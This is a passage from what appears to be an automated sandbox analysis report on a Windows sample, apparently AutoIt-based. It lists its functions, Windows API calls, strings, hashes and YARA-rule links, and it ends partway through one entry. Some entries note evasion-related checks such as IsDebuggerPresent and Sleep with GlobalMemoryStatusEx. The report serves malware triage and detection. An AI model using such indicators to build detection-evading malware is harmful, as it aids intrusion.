                                                      • Instruction ID: 75bfb42a4454862d017e48d8a23cbaa13df5d67b4bfbb694b6323cafb1b49d33
                                                      • Opcode Fuzzy Hash: b24669cbe19a48a89c9e0d8eeb139ca2bdbc654cb373b5f74c894d928071c9ac
                                                      • Instruction Fuzzy Hash: 53616276A10215EFCB14DF94C986FAEB7B8AF08310F15405DF946AB351DB71AE40CB60
                                                      Function 00A72AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00A72AC8
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A72AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 5393192a96f76717f6c1510af6c1e8708823512a036eb27f53ef490681ab8c08
                                                      • Instruction ID: 273cb58b9e1d4fdee450c1a2363a508a0915d0de3ae9bda700da863712528e57
                                                      • Opcode Fuzzy Hash: 5393192a96f76717f6c1510af6c1e8708823512a036eb27f53ef490681ab8c08
                                                      • Instruction Fuzzy Hash: AA5144724187449BD320AF50DD86BABBBFCFF94310F82885DF2D9511A5DB308529CB26
                                                      Function 00AC99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A6506B: __fread_nolock.LIBCMT ref: 00A65089
                                                      • _wcscmp.LIBCMT ref: 00AC9AAE
                                                      • _wcscmp.LIBCMT ref: 00AC9AC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 87963ae5d944a7d34034756fff7ebc66c6e2186f0a402f4e6405c10f0b609191
                                                      • Instruction ID: 7d6bd9b5e539af6ea615f8cca0d7ad5e821a141eab4b5c76e0ff2e3c35d7e956
                                                      • Opcode Fuzzy Hash: 87963ae5d944a7d34034756fff7ebc66c6e2186f0a402f4e6405c10f0b609191
                                                      • Instruction Fuzzy Hash: 2E41B572A00619BEDF209BA4DC45FEFBBB9DF49710F02007DF904AB181DA75AE0487A1
                                                      Function 00AD2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AD2892
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AD28C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 311832f16626a365ac54cbc90ed62e7806bfe4ee6e9a87bd27d3e4dc58fdac29
                                                      • Instruction ID: 5f98cb3c05fdad439cba019af14a2fc76226e747445ef751f4484f6a868eb2da
                                                      • Opcode Fuzzy Hash: 311832f16626a365ac54cbc90ed62e7806bfe4ee6e9a87bd27d3e4dc58fdac29
                                                      • Instruction Fuzzy Hash: 4E313971810119AFCF01EFA1CD85EEEBFB9FF18310F10402AF815A6266DB315A56DBA0
                                                      Function 00AE6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00AE6D86
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AE6DC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 4290051d641ae896ac1c5cfdd34a285687812b22bd364ad6820c536475b3366a
                                                      • Instruction ID: 50efa0a345c3f92e8e44616e61603475c532ef0ed55491324b422c3107e9b4dd
                                                      • Opcode Fuzzy Hash: 4290051d641ae896ac1c5cfdd34a285687812b22bd364ad6820c536475b3366a
                                                      • Instruction Fuzzy Hash: 8931AF71210644AEDB10DF65CC80AFB77B9FF98760F548A19F8A587190DA31AC91CB60
                                                      Function 00AC2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2E00
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AC2E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 25f9ba39a2522ab3f63e0880ab938e9f37aa64aaa51aa30be13a1ec27fce9c4a
                                                      • Instruction ID: 5850d64d9b1127684206a09881178f0223c59f238708b05373bac73bcb67ad67
                                                      • Opcode Fuzzy Hash: 25f9ba39a2522ab3f63e0880ab938e9f37aa64aaa51aa30be13a1ec27fce9c4a
                                                      • Instruction Fuzzy Hash: B431D231A00309EBEB25DF58D985FEEBFF9EF05350F19406EE985A61A0EB709944CB50
                                                      Function 00AE6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AE69D0
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE69DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 4b4af3a4e718126fbec5fdebc820d47f098fe42c899a78dff72c6687963b3e20
                                                      • Instruction ID: 21c5ad0fdbfd07e670daee97e9d2d58296459ee2936f0ca326d9ca3fa81dfe83
                                                      • Opcode Fuzzy Hash: 4b4af3a4e718126fbec5fdebc820d47f098fe42c899a78dff72c6687963b3e20
                                                      • Instruction Fuzzy Hash: 2211C4717002486FEF119F15CC80EFB3B6AEBA93E4F110524F9589B2A1D6719C5187A0
                                                      Function 00AE6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00AE6EE0
                                                      • GetSysColor.USER32(00000012), ref: 00AE6EFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 8c87e95954b536ad31a824ded1d1d63ddb201d5e12c6362e8f6ddc1de7a68941
                                                      • Instruction ID: b1128141898d4c25935ed52d7ddf8ee0c9a0c6f63dc7557e91243b142dbd6e66
                                                      • Opcode Fuzzy Hash: 8c87e95954b536ad31a824ded1d1d63ddb201d5e12c6362e8f6ddc1de7a68941
                                                      • Instruction Fuzzy Hash: 9121567261024AAFDB04DFA8DD45AEA7BB8FB18354F004A28FD55D3251E634E8619B60
                                                      Function 00AE6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00AE6C11
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AE6C20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 8b0fba6f05b76102a138d8d8829ae41f7a891624ea26334e245b3370f8ad3115
                                                      • Instruction ID: 21d30361f64211fa8e219af6b65bd491bacb81472e49bb69811ed96b0ab635cb
                                                      • Opcode Fuzzy Hash: 8b0fba6f05b76102a138d8d8829ae41f7a891624ea26334e245b3370f8ad3115
                                                      • Instruction Fuzzy Hash: F511BC71140288AFEB108F65DC85AEB3B69EB643B8F204B24F960D71E0C731DC919B60
                                                      Function 00AC2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2F11
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AC2F30
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 111e818a6b027e5d4db762b110074aca01392678485b11a2178fef2cf590003b
                                                      • Instruction ID: e5abeecfb42ed625211e58b8fa35e20b63067062ef65fe009108d30fc22f545b
                                                      • Opcode Fuzzy Hash: 111e818a6b027e5d4db762b110074aca01392678485b11a2178fef2cf590003b
                                                      • Instruction Fuzzy Hash: DE11C432901218ABDB21DB58DC44FA977B9EB05310F1680BDE854B72A0DBB0ED15C7D1
                                                      Function 00AD24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AD2520
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AD2549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 36528b6889719dadd8351f41872f0f480a6a191a7170152b408e2967ee5c389f
                                                      • Instruction ID: 9a5c48be1606db6b55041998df84d097f6c1c8a4eed4b4c84e2136d2e6ff971f
                                                      • Opcode Fuzzy Hash: 36528b6889719dadd8351f41872f0f480a6a191a7170152b408e2967ee5c389f
                                                      • Instruction Fuzzy Hash: F311E0B4101225BEDB258F519C98FFBFFA8FB26351F10812BF90646240D2746981DBF0
                                                      Function 00AD80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AD830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AD80C8,?,00000000,?,?), ref: 00AD8322
                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00AD8108
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 2496851823-2422070025
                                                      • Opcode ID: a914c8722674b82e9c4dcc1d0bbbb951e0e06ac1a2081baabbcb2b23167aeefa
                                                      • Instruction ID: 0936f87a77b525ebd01297dc8b8245d3d6805a49bd11e984bed62f16c3653a27
                                                      • Opcode Fuzzy Hash: a914c8722674b82e9c4dcc1d0bbbb951e0e06ac1a2081baabbcb2b23167aeefa
                                                      • Instruction Fuzzy Hash: B011C274500205ABCB20EFA4CC86FEDB374FF04360F10851BF9129B391DA31A8058751
                                                      Function 00AB92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AB9355
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 92a50731544cd6816c79e61e1ccd444b358574c6c66523c7d0a6bbc5592ac255
                                                      • Instruction ID: a377ac0f3514367653a1e147e251a9fa1e2397a9f051ce66567db455b7c9cc60
                                                      • Opcode Fuzzy Hash: 92a50731544cd6816c79e61e1ccd444b358574c6c66523c7d0a6bbc5592ac255
                                                      • Instruction Fuzzy Hash: 57019E71A15224AB8B04EBA4CCA1CFE77BDBF16320B540659B9726B2D2DB3159088660
                                                      Function 00AB91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AB924D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: a084d872d251877dc67b1163c687753de805ed74757549c311b338b4500d859d
                                                      • Instruction ID: c8a9f24816c28c2bc80f5c9adcc32b7f73f47e2399524ec4c8deb83d1790cad4
                                                      • Opcode Fuzzy Hash: a084d872d251877dc67b1163c687753de805ed74757549c311b338b4500d859d
                                                      • Instruction Fuzzy Hash: 47018F71E412087BDB08EBA0CAA6EFF77BD9F15340F140059BA12672D2EA116F1896B1
                                                      Function 00AB9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AB92D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 7f6d1a6ba18e4739493595bc1de54caf4f93bbb915b4593bb485b87de7bc2cdf
                                                      • Instruction ID: 58b1622d157ebd95a2a503df1ced21d1d967cc59864ed4c91ee3937127ed2de8
                                                      • Opcode Fuzzy Hash: 7f6d1a6ba18e4739493595bc1de54caf4f93bbb915b4593bb485b87de7bc2cdf
                                                      • Instruction Fuzzy Hash: 3701AD71E412087BCB04EBA0CA92EFF77BC9F25340F640125B912A32D3DA215F189272
                                                      Function 00AC51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 023997690cf60a0eea42e857b6203dd59f031f8eb58a71906fdff66052dfe57d
                                                      • Instruction ID: 84d6b1e49a99d1bbd3f60cb43865d7798e12ad567023ccef2b2f377ef26f1c79
                                                      • Opcode Fuzzy Hash: 023997690cf60a0eea42e857b6203dd59f031f8eb58a71906fdff66052dfe57d
                                                      • Instruction Fuzzy Hash: 67E02B32A002281AD720D7959C45FD7F7ECEB41721F00005AF910D3050E570AA4587D0
                                                      Function 00AB81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AB81CA
                                                        • Part of subcall function 00A83598: _doexit.LIBCMT ref: 00A835A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 51a3e5e1fba920bbdf9bf22e312a428f49cac8c261b85270582ed78ffe667052
                                                      • Instruction ID: d066b5e07c955fabb8c572d44d60a1c7950233c38e5401fd66514ac4a05f0556
                                                      • Opcode Fuzzy Hash: 51a3e5e1fba920bbdf9bf22e312a428f49cac8c261b85270582ed78ffe667052
                                                      • Instruction Fuzzy Hash: 69D0123228536836D21433E86D06BC6768C4B05F51F404425BB08555D389D556934399
                                                      Function 00A9B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A9B564: _memset.LIBCMT ref: 00A9B571
                                                        • Part of subcall function 00A80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A9B540,?,?,?,00A6100A), ref: 00A80B89
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A9B544
